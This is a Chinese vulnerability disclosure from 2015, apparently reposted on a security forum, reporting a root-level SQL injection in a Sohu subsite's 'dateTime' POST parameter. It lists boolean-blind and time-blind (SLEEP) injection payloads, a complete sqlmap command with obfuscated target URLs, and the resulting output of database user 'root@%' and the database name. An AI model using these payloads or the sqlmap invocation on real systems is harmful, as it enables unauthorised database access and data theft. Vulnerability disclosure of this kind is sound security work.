公开时间：        2015-12-05 17:34
转自：81bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4N6G2L8%4W2#2L8W2)9J5k6h3!0J5k6#2)9J5c8X3u0#2k6%4y4Q4x3V1k6%4L8$3!0&6N6h3&6Q4x3X3b7J5x3o6p5#2i4K6u0V1x3o6p5@1z5o6b7I4z5b7`.`.

简要描述：
搜狐某分站存在ROOT权限SQL注入漏洞
详细说明：
#1 存在问题网站

76bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4G2j5$3y4W2M7W2)9J5k6h3#2Q4x3X3g2K6L8$3S2#2i4K6u0W2j5$3!0E0i4K6u0r3c8$3I4G2j5X3q4D9f1$3!0U0j5$3g2J5b7$3g2F1N6r3g2J5i4K6u0r3f1X3g2U0k6i4m8@1K9h3!0F1i4K6u0r3d9h3&6U0k6h3I4#2k6q4y4U0K9r3g2V1N6h3I4W2i4K6y4r3k6r3q4@1k6g2c8A6L8h3g2Q4x3@1b7J5x3o6p5#2i4K6u0V1x3e0m8Q4x3X3b7J5x3b7`.`.

#2 注入类型

code 区域
Parameter: dateTime (POST)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: dateTime=2015-07-27%' AND 3147=3147 AND '%'='

    Type: AND/OR time-based blind

    Title: MySQL > 5.0.11 AND time-based blind

    Payload: dateTime=2015-07-27%' AND SLEEP(5) AND '%'='
漏洞证明：
code 区域
python sqlmap.py -u "a3cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4G2j5$3y4W2M7W2)9J5k6h3#2Q4x3X3g2K6L8$3S2#2i4K6u0W2j5$3!0E0i4K6u0r3c8$3I4G2j5X3q4D9f1$3!0U0j5$3g2J5b7$3g2F1N6r3g2J5i4K6u0r3f1X3g2U0k6i4m8@1K9h3!0F1i4K6u0r3d9h3&6U0k6h3I4#2k6q4y4U0K9r3g2V1N6h3I4W2" --data "dateTime=2015-07-27" --random-agent --current-db --threads 5

current user:    'root@%'

current database:    'SoccerDataCenter'
修复方案：
类型转换

[培训]科锐逆向工程师培训第53期2025年7月8日开班！